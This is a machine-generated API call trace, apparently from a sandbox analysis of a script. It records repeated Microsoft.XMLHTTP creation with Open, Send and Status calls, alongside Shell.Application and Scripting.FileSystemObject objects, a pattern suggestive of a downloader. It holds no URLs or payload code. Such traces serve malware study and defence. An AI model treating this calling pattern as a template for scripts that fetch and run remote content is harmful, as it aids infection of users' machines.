	[0795.498] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0795.498] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0795.498] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0795.498] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0795.499] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0795.499] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0796.557] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0796.558] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0796.558] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0796.558] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0796.558] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0796.558] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0796.558] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0796.558] SysStringLen (param_1=0x0) returned 0x0
	[0796.559] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0796.559] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0796.559] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0796.559] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0796.559] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0796.559] ??2@YAPEAX_K@Z () returned 0x62f350
	[0796.559] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0796.559] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0796.559] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0796.559] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0796.559] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0796.559] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0796.560] SysStringLen (param_1=0x0) returned 0x0
	[0796.560] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0796.563] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0796.563] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0796.563] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0796.563] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0796.563] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0796.564] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0801.832] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0801.833] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0801.833] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0801.834] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0801.834] SysStringLen (param_1=0x0) returned 0x0
	[0801.834] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0801.834] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0801.834] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5be0) returned 0x0
	[0801.834] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0801.834] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0801.834] ??2@YAPEAX_K@Z () returned 0x62f310
	[0801.834] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0801.835] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0801.835] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0801.835] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5be0) returned 0x0
	[0801.835] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5be0) returned 0x3
	[0801.835] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0801.835] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0801.838] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0801.838] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0801.838] SysStringLen (param_1=0x0) returned 0x0
	[0801.838] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0801.838] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0801.838] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c40) returned 0x0
	[0801.838] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0801.838] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7318) returned 0x0
	[0801.838] ??2@YAPEAX_K@Z () returned 0x62f330
	[0801.838] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7318, pUnkSite=0x62f330) 
	[0801.838] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0801.838] XMLHTTPRequest:IUnknown:Release (This=0x49c7318) returned 0x0
	[0801.838] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c40) returned 0x0
	[0801.838] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c40) returned 0x3
	[0801.839] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0801.839] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c40, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0801.839] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0801.839] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0801.839] SysStringLen (param_1=0x0) returned 0x0
	[0801.839] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0801.839] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0801.839] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0801.839] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0801.839] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74a8) returned 0x0
	[0801.839] ??2@YAPEAX_K@Z () returned 0x62f310
	[0801.839] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74a8, pUnkSite=0x62f310) 
	[0801.839] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0801.839] XMLHTTPRequest:IUnknown:Release (This=0x49c74a8) returned 0x0
	[0801.839] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0801.839] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0801.840] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0801.840] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0801.840] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0801.840] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0801.840] SysStringLen (param_1=0x0) returned 0x0
	[0801.840] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0801.840] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0801.840] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0801.840] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0801.840] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7548) returned 0x0
	[0801.840] ??2@YAPEAX_K@Z () returned 0x62f330
	[0801.840] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7548, pUnkSite=0x62f330) 
	[0801.840] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0801.840] XMLHTTPRequest:IUnknown:Release (This=0x49c7548) returned 0x0
	[0801.840] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0801.840] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
